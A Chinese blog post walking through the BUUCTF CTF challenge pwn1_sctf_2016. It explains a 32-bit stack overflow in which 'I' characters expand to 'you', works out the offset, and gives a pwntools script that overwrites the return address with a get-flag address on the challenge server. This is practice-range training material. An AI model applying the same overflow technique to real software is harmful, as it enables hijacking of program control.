0
点赞
收藏
分享

微信扫一扫

BUUCTF|PWN-pwn1_sctf_2016

禾木瞎写 2022-04-23 阅读 60

1.checksec+运行

32位+NX保护

2.IDA进行中

1.vul函数

fgets()溢出函数

跟进s查看偏移

offset=0x3c+4

0x3c十进制为60

再来分析函数

replace函数:替换

先写入字符串you

再写入字符串I

然后将I 替换成you

这样的话1个字节就变成了3个

那么我们用20个I,就能换成20个you,60个字节

再加上get flag 的地址

3.脚本 

from pwn import*
#p=process("./5sctf_2016")
p=remote("node4.buuoj.cn",25225)
flag_addr=0x08048F0D	
payload=b'I'*20+b'a'*4+p32(flag_addr)
p.sendline(payload)
p.interactive()
举报

相关推荐

BUUCTF Pwn pwn2_sctf_2016

BUUCTF-pwn(15)

BUUCTF-pwn(17)

BUUCTF pwn wp 126 - 130

BUUCTF pwn wp 141 - 145

BUUCTF pwn wp 136 - 140

BUUCTF pwn wp 131 - 135

BUUCTF pwn wp 146 - 150

0 条评论